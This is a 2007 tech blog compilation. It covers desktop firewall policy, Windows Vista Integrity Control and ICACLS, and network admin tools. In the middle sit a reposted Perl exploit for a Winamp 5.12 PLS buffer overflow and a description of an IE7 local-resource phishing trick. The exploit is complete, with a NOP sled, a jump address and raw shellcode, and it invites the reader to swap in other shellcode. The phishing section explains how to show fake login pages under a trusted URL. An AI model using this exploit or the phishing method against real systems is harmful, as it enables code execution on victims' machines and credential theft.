Computer and Technology

Wednesday, March 28, 2007

Standards in desktop firewall policies (Part 2)

Benefits of a desktop firewall policy

The ability to predict the impact of security-related events is enhanced. An event could have many characteristics and take on many different forms. If some of those characteristics involve network port access, the policy may offer an initial form of protection. In addition, network-oriented responses to these events become more predictable. For example, the application of router and network firewall ACLs are sometimes used to deter the propagation of virus and worms. The problem is, the implementation of ACLs could impact production software, in cases where both applications and a security event have similar port requirements. Depending on the characteristics of the event, the example policy may make ACLs unnecessary on some network segments.
Provide consistent software solutions (as opposed to multiple solutions that provide the same function). Two departments requiring a similar service may deploy two different software solutions. While it is best that departments in any organization coordinate development and deployment in software solutions, the reality is, this doesn't always happen. The policy defined above offers some hurdles for new applications. If the policy happens to conflict with the network requirements of the application a request for a policy enhancement would be required. At this point, if not already, the application becomes known to the organization.
Restrict the ability for network-oriented programs from hitting the desktop until evaluated. Again, the policy may offer some new hurdles for applications, depending on their requirements. A recent example could be Microsoft's Activesync 4.0 software. The example policy above would require modifications, which could carry the concept of being loose or tight. (Visit Microsoft's Activesync page for the requirements.) The policy impacts the application in several areas: inbound port requirements, backend network construction, and these involve the use UDP along with TCP. A modification of the policy may include a fairly tight rule that binds the local ports to the application for the backend network only, such as:
Analysis of the application through the use of Nmap can verify the port requirements on the backend network, but also reveals activity on the primary network. In this case a ‘status' port that is TCP 999 becomes active on the primary network when the handheld that uses Activesync is cradled. In theory one could execute a single port scan against port 999 on a subnet and identify all IP address which currently are ‘syncing' a handheld. Depending on the firewall internals and given the policy defined, Nmap may indicate ‘closed' for port 999. Some firewalls can be configured to drop an inbound packet for a port that is blocked, which would return nothing in this case.
Restrict the use of service-oriented software. Individuals involved or concerned with security have to be interested and even frustrated with this. Software running on an ordinary desktop (as opposed to a ‘server') that requires a port used for listening could be susceptible to coding errors allowing inbound access or backdoors. They should be avoided.
Software using unusual protocols will become known (such as systems using the streaming protocol IGMP). While the use of protocols other than IP isn't itselft an issue, it's an advantage to know they are in use. Some firewalls will not pass these protocols, and isolation of their use could be difficult. It's now common for the software provider or vendor to make their networking requirements available for organizations supporting a desktop firewall.
Track the use of broadcast-oriented software which usually runs as UDP. The example policy in this article would disable the response to a UDP broadcast. A good standard for any organization is to define service-oriented equipment, such as printers and scanners, using static IP addresses, and make the user aware of the names and IP addresses of these facilities that are in their area. The security issue in this case is that the service could be spoofed. A phony print server could be created to capture and forward printouts to the actual server.
Track the use of backend networks or dual-homed machines. The example policy may reveal a backend, depending on what it is being used for. The use of backend networks won't directly cause security concerns, but their existence and use should be identified. For example, asset and patch management could be impacted, and real vulnerability assessment would also not be possible.
Software and desktop support can be impacted and simplified. The example policy offers some limitations on what software can do on the network. Software requiring modifications to the policy obviously becomes known, and the specific policy modifications would help create a consistent deployment.
The example policy would help in the enforcement of the organization's security policies or detection of software which might break this policy. For example, it may be part of the security policy to prohibit the use of database, web, ftp or P2P servers on ordinary desktops. The policy in this example would block those services.
A global policy could help enforce an organizations specific standards; such as the use of a remote access VPN or streaming media solution. The example policy would most likely require modifications to support VPN. Typically the software requirements of VPN would differ between vendors as well.
The policy could be used to limit access to services running over non-standard ports. For example, assume that only minimum outbound internet access restrictions are in place and a policy and mechanism exists to monitor and log Internet web access. Typically web access is done using TCP port 80. However it is possible for a user to access an external anonymous web proxy (such as www.proxyblind.org; there are many others) that may run on a port other than 80. This usage would bypass logging and allow the user to surf the web anonymously. A modification to our example policy restricting iexplorer.exe to outbound TCP port 80 could be created. Limitations on other ports commonly used to support anonymous web proxies could also be created (for example, these are often found on TCP ports 3128, 8000 and 8080)

Summary

A common desktop firewall policy could lead to, or help in the enforcement of, software networking standards. If this is something an organization wants, there are clear benefits. Depending on whether the organization is running a firewall with a consistent policy or not, networking standards at some level may already be enforced. New applications may or may not be compatible with this policy, and changes or modifications would need to be requested. Those who deploy new software may need to be a bit more familiar with the network requirements of their software, to be able to adhere to policy.

The desktop firewall, typically just one piece of desktop security, often is combined with patch management, anti-virus and software deployment/management facilities to form a complete security solution. As part of that solution, the desktop firewall's job is to simply block network traffic and detect attacks. Yet the reality is, it can do more than this although added features may not be quite as tangible as the supplying desktop protection.

The implementation and maintenance of a desktop firewall can be a stressful and frustrating experience – particularly for those organizations who do not have a full understanding of their own network requirements. It can cause existing software to become disabled. It could require deployment dates to be extended due to additional development time required to isolate compatibility issues. It may require additional resources or steps to get software to the desktop.

Conclusion

In this article we discussed the need for a desktop firewall policy within an organization. It was discussed how such a policy should be formed, and then an example was provided – along with a detailed discussion of the security benefits it provides an organization.

An old school of thought would resist any restrictions placed on internal network access. But today the stakes are a higher, and security is paramount. At some point in the history of networked computing, an organization has become more accountable for its network traffic and legality of the software it chooses to run. Not many options are available for limiting the use of the network (beyond simply blocking it at the usual choke points, which doesn't allow for the controlling of specific applications). This approach needs to change, as more and more attacks and security concerns come from the soft underbelly of the organization's internal network.

by Phil Kostenbader, CISSP, and Bob Donnelly, CISM, CISSP

Standards in desktop firewall policies (Part 1)

The idea of a common desktop firewall policy in any size organization is a very good thing. It makes responses to external or internal situations such as virus outbreaks or network-oriented propagation of viruses more predictable. In addition to providing a level of protection against port scanning, attacks or software vulnerabilities, it can provide the organizations local security team a baseline or starting point in dealing with such events.

The purpose of this article is to discuss the need for a desktop firewall policy within an organization, determine how it should be formed, and provide an example of one along with the security benefits it provides an organization.

The Problem

The trick to a good desktop firewall policy is to provide a balance between security and the networking requirements of the applications needed by the organization. It's possible the organization may not yet have a complete knowledge of these requirements. This should make the first attempt to define a standard/global policy interesting, depending on the level of protection one is trying to provide and the situation or environment the desktops may be in.

One thought on an initial policy is to provide a port-based firewall with all inbound ports blocked on the desktop. On the other hand, an old school of thought might involve one blocking only the ports that need to be blocked, by estimating software network requirements and then combining this with an effort to also block the most obvious of possible vulnerabilities or services. Evaluating FTP, Windows IIS or NetBIOS requirements might provide a first pass at a standard global policy. Our old school of thought again would leave the balance tipped toward the (as yet unknown) network requirements of the software, and less toward protection. In other words, offer functionality over security. While providing consistency, cases where the desktop (or laptop) is located off site may not fully satisfy security requirements of the organization.

Location awareness may be a feature of the desktop firewall that one could use to design a policy that changes to better fit a user's location. Some personal firewall solutions provide location awareness as a feature. Location selection could be automatically selected depending on a successful Windows domain login, specific IP address, DNS server address, network adaptor type, or it could be based on the client firewall's ability to connect to a policy manager.

If location awareness is not a built-in feature of the firewall, the policy could be designed around the organization's internal IP address range or, if available, be configured around the DNS domain name. For example:

allow all inbound *.someorganization.org

Issues with a "block all" inbound policy

A block all inbound policy while connected offsite would seem to present the least amount of risk, but might not be completely possible while onsite. The first issue may be caused by the firewall itself. Depending on the vendor, characteristics of the firewall may impact application functionality while using a block all inbound policy. This may include UDP, complex protocols like FTP, NFS, applications running in a service mode, and problems with a Intrusion Prevention System if one is provided with the firewall. Each of these issues will be discussed below.

UDP, being a stateless protocol, is difficult for any firewall to handle. A simple UDP based service may run on port 1313, or example. The UDP client (running the desktop firewall) would attempt to connect to 1313, and assign a port for a reply. There may or may not be a reply; if there is, it won't be easy for the firewall to determine whether or not to allow it. Either the firewall needs to attempt to keep state of all outbound UDP traffic on its own, or UDP port requirements must be known and the firewall must be configured to allow the reply on a case-by-case basis.

An example of a facility requiring UDP might be printer or scanner client that issues a UDP broadcast and then awaits a reply. That reply would come from a scanner or printer the user may want to access, and it might include its status or availability.

FTP could cause another possible issue with the firewall. In some cases the firewall may not support active FTP, which is unusual as Microsoft Windows doesn't support passive mode. Active FTP is where the ftp server will initiate a connection back to the client to do the actual transfer of data. Oddly, FTP is still used and sometimes even embedded within other software. Fixes for active FTP on firewalls can be ugly and may end up being one of the first application-based rules.

Applications running in a service mode can have one of two solutions: either the firewall requires an application-based rule where the application's network access is restricted to predefined ports, or one can simply allow the open port, possibly with some other restricting criteria. Restrictions by IP address or time of day are possible as well, and may be desired.

An Intrusion Prevention System may be an additional feature of a desktop firewall within an enterprise. This would allow the firewall to detect possible attacks by examining the inbound packet and matching data and port usage against a list of known attack signatures. The IPS may be configured to respond by blocking the inbound packet or allowing it and sending an alert. False positives on a firewall supporting IPS could mistakenly block inbound traffic and would need to be analyzed and adjusted on case-by-case basis. Logging the event and allowing the traffic may be the quickest and easiest way to deal with false positives.

The Environment

In this part of the article, we detail what is needed to create an environment where software requirements are known and our corporate standards are enforced:

a desktop firewall This is the tool used to enforce restrictions on network access by limiting port and protocol access. The firewall should limit the user's ability to change its configuration, yet provide enough function such that the user can identify issues that may be caused by the firewall policy. The firewall should support port- and application-based filtering.
A security policy This will define what is or is not permitted to or from the network, on a standard desktop. Typically this would be generated by a high-ranking security group or set of officials in the organization, and would be generalized into a non-technical document (it could be as simple as block all inbound rule).
Knowledge of existing port requirements or a baseline of requirements These would be taken standard or default desktop operating system configuration used in the organization. Typically an organization would have an install tailored to its own requirements, and it may include patches, anti-virus, and common software required by all users. This, combined with the security policy, would form the basic desktop firewall policy.
Ability to deploy a single global firewall solution to all desktops This means deploying the solution to all desktops in the organization with a consistent or single policy. Enforcement and tracking of deployment would also be necessary.
Facility to provide and update the firewall policy Some firewalls can be centrally managed directly. Depending on the needs or structure of the organization, the minimum requirements would require a common/global firewall policy that can be updated, for example through the replacement of a configuration file. Obviously some form of central software management would need to be in place.
Large plastic bat to handle upset users
Tools to aid in the analysis of the networking requirements For example, this might include Ethereal for monitoring traffic, the ability to analyze firewall logs, Perl scripts to test firewall rules, Nmap for port scanning, and so on.

"Software Networking Standards" – A potential benefit
An example

If the organization knows the networking requirements of its applications, a policy could easily be created. Then the idea of software networking standards could be enforced through the policy. In order to provide a firewall policy for the examples below, let's first assume that a policy is designed and configured to block all inbound TCP/UDP, and allow all outbound TCP/UDP. We will also assume the firewall does not properly handle outbound UDP or complex protocols such as FTP. Some known software requirements in this environment may be obvious, for example support the organization permits file sharing. This would require inbound TCP port 445 open . A rule is created to support inbound 445 and also restrict the rule to a range of IP address (192.168.4.0 through 192.168.20.255 in this example, with the understanding that this private IP address range could be used by other organizations such as hotels as well, creating a potential hole for traveling users). Finally, ICMP is allowed for troubleshooting. A sample policy might thus be configured to:

Allow all inbound and outbound ICMP
Allow inbound TCP 445 from hosts 192.168.4.0 – 192.168.20.255
Block all inbound TCP
Block all inbound UDP
Allow all outbound TCP
Allow all outbound UDP

Let's now look at the benefits of using our sample policy.

by Phil Kostenbader, CISSP, and Bob Donnelly, CISM, CISSP

Introduction to Windows Integrity Control (Part 2)

Tony Bradley, CISSP-ISSAP 2007-02-02

In Windows XP or older systems, whether or not the malware succeeds is more or less a function of the rights and privileges of the logged in user and whether or not the system and Registry have been hardened or protected in any way to block such attempts. With Vista, because everything related to the Internet runs at a Low integrity level, the malware will be unable to modify, delete or interact with virtually anything else on the system.

These protections will protect Vista systems from the vast majority of malware. Most of the time, users now become compromised or infected by malware through visiting malicious web sites, or opening email file attachments. The same protection does not apply when a user brings in files on CD, DVD, USB drive or other removable media however. These files will execute in the context of the integrity level of the logged in user.

Using Protected Mode

The automatic designation of Low integrity relies on Internet Explorer running in Protected Mode. Protected Mode has been hyped as one of the significant security updates in Windows Vista and in Internet Explorer 7. As long as Protected Mode is on, everything that Internet Explorer does is assigned Low integrity by default.

Some sites may not function properly with the restrictions imposed by Protected Mode. It is possible, on the Security tab of the Internet Options configuration console, to uncheck the option to ‘Enable Protected Mode’. Doing so removes most of the protection Vista provides against unauthorized or malicious activities via the Internet though, so it is highly recommended that you leave Protected Mode on.

In an enterprise, the ability to enable or disable Protected Mode can, and should be, be removed using Group Policy. For individual users, rather than disabling Protected Mode to access sites that have issues, simply add those sites to the Trusted security zone in Internet Explorer. Each security zone in Internet Explorer has its own unique security configuration, and the Trusted zone runs with Protected Mode disabled by default.

Using ICACLS to view integrity levels

One of the issues that Administrators typically run into when it comes to dealing with rights and permissions in a Windows environment is trying to figure out who has access to what? If a process fails, or a file won’t execute, or a user can’t write data to a folder, one of the troubleshooting methods might be to examine the WIC integrity level of the object in question and the object it is trying to act on to determine if perhaps WIC is behind the failure.

Windows Vista does not provide anything slick or pretty to let you view or alter the integrity level of an object. There is, however, a command line utility called ICACLS which will display the contents of the discretionary ACL, as well as mandatory labels. As stated earlier, objects that are not explicitly assigned a label are automatically designated as Medium integrity, however the Medium integrity label won’t show up using ICACLS because it is implied and not explicit.

To use the ICACLS utility, you first need to open a command prompt window. There are a number of switches and syntax possibilities to use with the ICACLS tool. You can get information and details on each of the options and examples of their uses by simply typing ‘icacls’ at the command prompt and hitting Enter. We will focus on two uses of ICACLS here.

First, viewing the integrity level. To view the integrity level, and other contents of the discretionary access list, type icacls followed by the path of the object you wish to examine. For example, if you wish to view the mandatory integrity level of the explorer.exe file, you would type icacls c:\windows\explorer.exe. The results will look like this:

C:\windows\explorer.exe NT SERVICE\TrustedInstaller:(F)
  BUILTIN\Administrators:(RX)
  NT AUTHORITY\SYSTEM:(RX)
  BUILTIN\Users:(RX)

As mentioned above, the mandatory integrity level assigned to the explorer.exe file is implied by the fact that it does not have a specific mandatory integrity level assigned. If there were a mandatory integrity level, there would be an additional entry that would look like this:

    Mandatory Label\Medium Mandatory Level

Just keep in mind that if you are using ICACLS to try and determine the mandatory integrity level being used to determine object interactions in WIC, no mandatory label entry means that it is a Medium by default.

It is also possible to change an object’s integrity level using ICACLS. To do so, a user must be assigned the SeRelabelPrivilege. In order to change the integrity level of an object, the user needs the authority to “change permissions” as well as “take ownership” of the target object. As long as these privileges are in place, a user may modify or elevate the integrity level of an object. However, the user can never set the object to a higher integrity level than their own.

Assuming you have the proper permissions and privileges, you can modify the mandatory integrity level of an object with the ICACLS tool by typing icacls /setintegritylevel H|M|L. The label at the end, either H, M or L, assigns a mandatory integrity level of High, Medium or Low to the specified object respectively.

Safer and more secure with WIC

When it comes to securing data on a Windows-based computer, one of the most unpredictable and uncontrollable variables is the human component. Organizations have started to realize that users can not be relied upon to properly classify and encrypt sensitive information, so there is a growing trend to implement whole disk encryption, especially on mobile computing devices, and remove that variable.

Windows Integrity Control operates from a similar perspective. Users may have the ability to own files and folders and assign rights and privileges regarding which groups or individuals should be allowed to view, modify, delete, or otherwise perform actions on them. However, the user’s discretion can not always be relied upon, therefore discretionary access controls can not be relied upon to protect the objects in question.

With WIC, Microsoft has added the concept of mandatory access controls which are more or less set by the operating system, and trump, or override the discretionary access controls. Segregating all files and processes that originate from the Internet and prohibiting them from interacting with or modifying files or objects on the system help to make the system more secure when surfing the Web.

WIC is not a silver bullet. There are some improvements that could be made, for example providing a better management and configuration tool than the ICACLS command line tool. The security provided by WIC is not perfect, but it is superior to the current Windows security model and helps protect a Vista system from many threats which could impact Windows XP, Windows 2000 or older operating systems.

Introduction to Windows Integrity Control (Part 1)

Tony Bradley, CISSP-ISSAP 2007-02-02

This article takes a look at the Windows Integrity Control (WIC) capabilities in Windows Vista by examining how it protects objects such as files and folders on Vista computers, the different levels of protection offered, and how administrators can control WIC using the ICACLS command-line tool. WIC is intended to protect a system from malware and user error by helping to establish different levels of trust on objects.

System integrity - Who can you trust?

When the developers at Microsoft set out to create the latest version of their operating system, Windows Vista, they set out to ensure it was the most secure version of Windows yet. One of the functions that has been built in to Windows Vista which helps to make it more secure is Windows Integrity Control, or WIC.

The purpose of WIC is to protect objects, whether they are files, printers, named pipes, registry keys, and so on from attacks, malware or even innocent user error. The concept of WIC is based on establishing the trustworthiness of the various objects and controlling the interactions between objects based on their integrity, or level of trustworthiness.

The integrity levels of WIC are a mandatory control and override discretionary controls such as NTFS file and folder permissions which most administrators are familiar with. The primary objective of WIC is to ensure that only objects with an integrity level equal to or greater than the target object are allowed to interact with it. Essentially, if an object is less trustworthy, it is prohibited from acting on, or interacting with more trustworthy objects.

Again, WIC trumps normal permissions. That means that even if a file or process has Full Control permissions to another object, if the file or process has a lower integrity level than the object it is trying to interact with WIC will override the permissions and the interaction will be denied.

Determining trustworthiness using WIC

In order to police the interactions between objects, Windows must first determine the trustworthiness, or integrity level of each object. WIC assigns one of the following six integrity levels to each object:

Untrusted – processes that are logged on anonymously are automatically designated as Untrusted
Low – The Low integrity level is the level used by default for interaction with the Internet. As long as Internet Explorer is run in its default state, Protected Mode, all files and processes associated with it are assigned the Low integrity level. Some folders, such as the Temporary Internet Folder, are also assigned the Low integrity level by default.
Medium – Medium is the context that most objects will run in. Standard users receive the Medium integrity level, and any object not explicitly designated with a lower or higher integrity level is Medium by default.
High – Administrators are granted the High integrity level. This ensures that Administrators are capable of interacting with and modifying objects assigned Medium or Low integrity levels, but can also act on other objects with a High integrity level, which standard users can not do.
System – As the name implies, the System integrity level is reserved for the system. The Windows kernel and core services are granted the System integrity level. Being even higher than the High integrity level of Administrators protects these core functions from being affected or compromised even by Administrators.
Installer – The Installer integrity level is a special case and is the highest of all integrity levels. By virtue of being equal to or higher than all other WIC integrity levels, objects assigned the Installer integrity level are also able to uninstall all other objects.

In terms of the impact on Windows Vista security, these integrity levels and WIC protect objects from intentional or unintentional modification or deletion by less trusted objects. By setting the Medium integrity level as the default mode for standard users and for all unlabeled objects, Vista protects the majority of objects on the computer from being affected in any way by threats from the Internet, which run at the Low integrity level by default.

Similarly, although Administrators are more powerful than standard users and operate at the High integrity level, the operating system kernel and core functionality receive a higher System integrity level, ensuring that even an absent-minded Administrator or compromised Administrator account can not adversely impact the core system.

To reiterate, the WIC integrity levels and controls are very similar to normal NTFS file and folder permissions. The primary difference is that NTFS permissions are discretionary controls while WIC integrity levels are mandatory controls. Basically, file and folder access privileges and permissions are assigned by the object owner or an administrator, while WIC integrity levels are dictated by the operating system.

While the upper four levels receive little practical use, the differentiation between Low integrity and Medium integrity is where the majority of WIC’s functionality lies. Implementing mandatory controls rather than relying only on the discretion of users or administrators certainly provides more security at all levels. But, the ability to segregate files and processes from the Internet and protect the computer from Internet-borne malware is one of the primary reasons for the existence of WIC.

Protecting Vista from Internet threats

While standard users operate at a Medium integrity level and Administrators are designated as High integrity, WIC assumes that the Internet, and any associated files or processes, are completely untrustworthy and assigns them a Low integrity level by default.

When a user receives an email with a link to a malicious web site (the sort of email they have been told a thousand times to delete), and he clicks on it, the malicious web site may attempt to install some sort of nasty malware. The malware will typically copy itself to some location on the hard drive and modify Registry keys to ensure its continued existence. It may also try to modify or delete other files or execute processes to initiate other malicious activity.

Sunday, March 25, 2007

Winamp Buffer Overflow Exploit (Crafted PLS)

Winamp is "a proprietary media player written by Nullsoft, a subsidiary of Time Warner. It is skinnable, multi-format freeware / shareware".

Winamp 5.12 is vulnerable to buffer overflow when it tries to open maliciously crafted PLS playlist file.

Credit:
The information has been provided by milw0rm.
The original article can be found at:
http://www.milw0rm.com/exploits/3422

Vulnerable Systems:
* Winamp versions 5.12 and prior

Exploit:
#!/usr/bin/perl -w
# ==================================
# Winamp 5.12 Playlist UNC Path Computer Name Overflow Perl Exploit
# By Umesh Wanve (umesh_345@yahoo.com)
# ===================================
# Credits : ATmaCA is credited with the discovery of this vulnerability.
#
# Date : 07-03-2007
#
# Tested on Windows 2000 SP4 Server English
# Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
#
# Buffer = "\x90 x 1023" + EIP
#
# Desc: you cant put shellcode after EIP. No more space after this. The winamp simply crashes. When you debug it, you will see that
# shellcode is 304 bytes away from ESP. So jump to esp + 304 should work. Find such address if u can.
#
#
# This was written for educational purpose. Use it at your own risk.Author will be not be responsible for any damage.
#
#
#=================================

#jump to shellcode
$jmp="\x61\xD9\x02\x02".
"\x83\xEC\x34".
"\x83\xEC\x70".
"\xFF\xE4";

#\x83\xEC\x34 add esp ,34
#\xFF\xE4 jump esp

$nop="\x90" x 856;

$start= "[playlist]\r\nFile1=\\\\";
$end="\r\nTitle1=Winamp Exploit by Umesh\r\nLength1=512\r\nNumberOfEntries=1\r\nVersion=2\r\n";

#open calc.exe
$shellcode =
"\x54\x50\x53\x50\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x02".
"\xdd\x0e\x4d\x83\xee\xfc\xe2\xf4\xfe\x35\x4a\x4d\x02\xdd\x85\x08\x3e\x56\x72\x48".
"\x7a\xdc\xe1\xc6\x4d\xc5\x85\x12\x22\xdc\xe5\x04\x89\xe9\x85\x4c\xec\xec\xce\xd4".
"\xae\x59\xce\x39\x05\x1c\xc4\x40\x03\x1f\xe5\xb9\x39\x89\x2a\x49\x77\x38\x85\x12".
"\x26\xdc\xe5\x2b\x89\xd1\x45\xc6\x5d\xc1\x0f\xa6\x89\xc1\x85\x4c\xe9\x54\x52\x69".
"\x06\x1e\x3f\x8d\x66\x56\x4e\x7d\x87\x1d\x76\x41\x89\x9d\x02\xc6\x72\xc1\xa3\xc6".
"\x6a\xd5\xe5\x44\x89\x5d\xbe\x4d\x02\xdd\x85\x25\x3e\x82\x3f\xbb\x62\x8b\x87\xb5".
"\x81\x1d\x75\x1d\x6a\xa3\xd6\xaf\x71\xb5\x96\xb3\x88\xd3\x59\xb2\xe5\xbe\x6f\x21".
"\x61\xdd\x0e\x4d";

open (MYFILE, '>>poc.pls');

print MYFILE $start;

print MYFILE $nop; #856

print MYFILE $shellcode; #165

print MYFILE "\xCC\xCC"; #2 bytes

print MYFILE $jmp; # EIP

print MYFILE "\x90\x90\x90\x90";

print MYFILE $end;

close (MYFILE);

Phishing Using IE7 Local Resource Vulnerability

Internet Explorer 7.0 is vulnerable to cross-site scripting in one of its local resources. In combination with a design flaw in this specific local resource it is possible for an attacker to easily conduct phishing attacks against IE7 users.

Credit:
The information has been provided by Aviv Raff.
The original article.

Vulnerable Systems:
* Windows Vista - Internet Explorer 7.0
* Windows XP - Internet Explorer 7.0

The navcancl.htm local resource is used by the browser when for some reason a navigation to a specific page is canceled. When a navigation is canceled the URL of the specific page is provided to the navcancl.htm local resource after the # sign. For example: res://ieframe.dll/navcancl.htm#http://www.site.com. The navcancl.htm page then generates a script in the Refresh the page. link in order to reload the provided site again when the user clicks on this link. It is possible to inject a script in the provided link which will be executed when the user clicks on the Refresh the page. link. Luckily, Internet Explorer now runs most of its local resources (including navcancl.htm) in Internet Zone , so this vulnerability cannot be exploited to conduct a remote code execution.

Unfortunately, there is also a design flaw in IE7. The browser automatically removes the URL path of the local resource and leaves only the provided URL. For example: when the user visits res://ieframe.dll/navcancl.htm#http://www.site.com, IE7 will show http://www.site.com in the address bar.

To perform a phishing attack, an attacker can create a specially crafted navcancl.htm local resource link with a script that will display a fake content of a trusted site (e.g. bank, paypal, MySpace). When the victim will open the link that was sent by the attacker, a Navigation Canceled page will be displayed. The victim will think that there was an error in the site or some kind of a network error and will try to refresh the page. Once he will click on the Refresh the page. link, The attacker s provided content (e.g. fake login page) will be displayed and the victim will think that he s within the trusted site, because the address bar shows the trusted site s URL.

Wednesday, March 14, 2007

Technorati news

Technorati Profile

Monday, March 12, 2007

Download Fedora Core 6 Now

Download Now

Download Fedora Core 6 images:

i386
x86_64
ppc

Slow downloading?

Fedora mirror sites are available all over the world.
BitTorrent is a great way to get and spread Fedora.
Get Fedora on physical media. Order online or visit a local vendor.

New to Fedora Core?

If you are new to Fedora Core, please read the full installation instructions. These are also available in a printable version.

Sunday, March 11, 2007

Top Network Administrator Tools

Scanning Tools

Nmap
http://www.nmap.org

Nmap is a port scanner. A port scanner scans for open ports, such as 80 (http) or 25 (SMTP)

Port Scanners-Every computer program and utility that is designed to interact with a network is also assigned a specific port number. A port number can range from 1 to whatever the designer assigns. Your browser uses port 80 because this is the number assigned to HTTP. FTP is 21, mail or SMTP is 25 or 110 for POP3. Because ports are the entrance in anynetwork ready device they have to sometimes be blocked off to preventintrusion. This is where a port scanner comes into play. It can be aimed at a single IP address or an entire network to scan to see whichports are open and available. Because of this, many networkadministrators limit the number of ports to be used. There are several methods to closing off port access, either by blocking them on your workstation or server, through a security access-list from a router or firewall, or using port translation. (Port translation is where all incoming requests for say port 80 are translated to port 2080.) A network administrator uses a port scanner to test his or her networkas well as a hacker. Follow this LINK to a series of FREE Scanning tools.

Sam
Spade – www.samspade.org/

Sam Spade is a multi network query tool with many extra built in utilities, even a tool for spam. It includes utilities such as ping, whois, traceroute, and finger.

NetScanTools

Pro ($199)
http://www.netscantools.com/nstmain.html

NetScanTools Pro is an investigation tool that gathers information about the Internet or local LAN users, IP addresses, ports, and many other network specifics. NetScanTools Pro has a Port Scanner, Ping, Traceroute, OS Fingerprinting, NetScanner and custom ICMP packet generator. This tool tests systems and firewalls for vulnerabilities and exposed ports. This utility can also use NetBIOS info to look for open (writeable) Windows shares on the local area network.

SuperScan
http://www.foundstone.com/

SuperScan is a powerful connect-based TCP port scanner, pinger and hostname resolver. Multithreaded and asynchronous techniques make this program extremely fast and versatile. The Foundstone Group as a multitude of free tools and is a division of McAfee.

NetCat
http://netcat.sourceforge.net/

NetCat is a featured networking utility, which reads and writes data across network connections, using the TCP/IP protocol. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities. This tool can also be used as a port sniffer.

Sniffers/Network Protocol Analyzer

Sniffers and network protocol analyzers capture packets so you can examine them. You can see what resource or port is being used, and where the requesting packets are originating. If a program is mailing spam from a computer, you will see the destination address and port 25 being used. Any program sending packets in or out of your system, a sniffer will capture its progress and display it in a report.

Ethereal
http://www.ethereal.com/

Ethereal is a powerful multi-platform networkers tool that can be used with Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, viewing summary and detail information for each packet. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. A text-based version called ethereal is included. This tool that hackers and network admins preferred tool.

EtterCap
http://ettercap.sourceforge.net/

Ettercap is a network sniffer/interceptor/logger for Ethernet LANs. It supports active and passive dissection of many protocols. Data injection in an established connection and filtering on the fly is also possible, keeping the connection synchronized. Many sniffing modes were implemented to give you a powerful and complete sniffing suite. Plugins are supported. It has the ability to check whether you are in a switched LAN or not, and to use OS fingerprints (active or passive) to let you know the geometry of the LAN.

Snort
http://www.snort.org/

A free intrusion detection system (IDS) for the masses. Snort is a lightweight network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks. It can perform protocol analysis, content searching/matching and can be used to detect a variety of attacks and probes, such as buffer overflows, stealth port scans, CGI attacks, SMB probes, OS fingerprinting attempts, and much more. Snort uses a flexible rule based language to describe traffic that it should collect or pass, and a modular detection engine. Many people also suggested that the Analysis Console for Intrusion Databases (ACID) be used with Snort.

WinDump / TCPDump
http://www.tcpdump.org/wpcap.html

WinDump is the porting to the Windows platform of TCPDump, the most used network sniffer/analyzer for UNIX. WinDump is fully compatible with TCPDump and can be used to watch and diagnose network traffic according to various complex rules. It can run under Windows 95/98/ME, and under Windows NT/2000/XP.

DSniff
http://naughty.monkey.org/~dugsong/dsniff/

DSniff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKI.

Process Enumeration

Viruses, trojans, rootkits, and other host infections that have been executed can show up in processes inside the task manager, but not always. You cannot rely on the task manager to display all processes; this is why it is necessary to have a program that will detail all running processes. Here are a few programs that I like to use to flush out a hiding pest.

Fport
http://www.foundstone.com/

Fport is a great tool that I use often. It reports all open TCP/IP and UDP ports and maps them to the owning application. This is the same information you would see using the 'netstat -an' command, but it also maps those ports to running processes with the PID, process name and path. Fport can be used to quickly identify unknown open ports and their associated applications. Foundstone offers over 30 free networking tools to down load from there website.

PsTools
http://www.sysinternals.com/

PsTools is a suite of fantastic and dangerous (in the wrong hands) command line utilities made by Mark Russinovich for Windows. In the right hands, (computer professionals) PsTools can either automatic a computers shutdown, list a computer’s running processes, or kill a process. PsTools is a favorite of network pros and hackers alike. In this book I demonstrate the use of this tools on page:

The tools included in the PsTools suite, which are downloadable individually or as a package, are:
PsExec - execute processes remotely
PsFile - shows files opened remotely
PsGetSid - display the SID of a computer or a user
PsKill - kill processes by name or process ID
PsInfo - list information about a system
PsList - list detailed information about processes
PsLoggedOn - see who's logged on locally and via resource sharing (full source is included) PsLogList - dump event log records
PsPasswd - changes account passwords
PsService - view and control services
PsShutdown - shuts down and optionally reboots a computer
PsSuspend - suspends processes
PsUptime - shows you how long a system has been running since its last reboot (PsUptime's functionality has been incorporated into PsInfo) - shows you how long a system has been running since its last reboot (PsUptime's functionality has been incorporated into PsInfo)

Tlist – Microsoft Resource Kit

Tlist is a task list viewer that can be found in Microsoft Recourse Kit. This tool displays a list of IDs, names, and windows of processes running on the local computer. Tlist is my main tool used in my arsenal of anti-hacker tools. It allows me to view not only the processes running on the system, but where the program is located within the server. Once you can isolate the alien program running on your system, you can use kill.exe, another Resource Kit tool to stop it so you can delete in from your system, or Pskill.exe to remove it.

Tasklist – Windows XP

Tasklist displays a list of applications and services with their Process ID (OID) for all tasks running on either a local or a remote computer.

Syntax

tasklist[.exe] [/s computer] [/u domain\user [/p password]] [/fo
{TABLE|LIST|CSV}] [/nh] [/fi FilterName [/fi FilterName2 [ ... ]]] [/m [ModuleName] | /svc | /v]

Process Killer

Programs, alien or not, run as processes. Sometimes Windows will not allow you to delete a file if it is running as a process until you stop it first. Here a few programs that you can use to kill a process with.

PsKill.exe – From the PsTools suite of utilities.

Kill.exe – This tool can be found with Window Resource Kit.

TaskKill – Windows XP

TaskKill is an XP utility that allows you to end one or more tasks or processes. Processes can be killed by process ID or image name.

Syntax taskkill [/s Computer]
[/u Domain\User [/p Password]]] [/fi FilterName] [/pidProcessID]|[/imImageName] [/f][/t]

Wireless

Network Stumbler
http://www.stumbler.net/

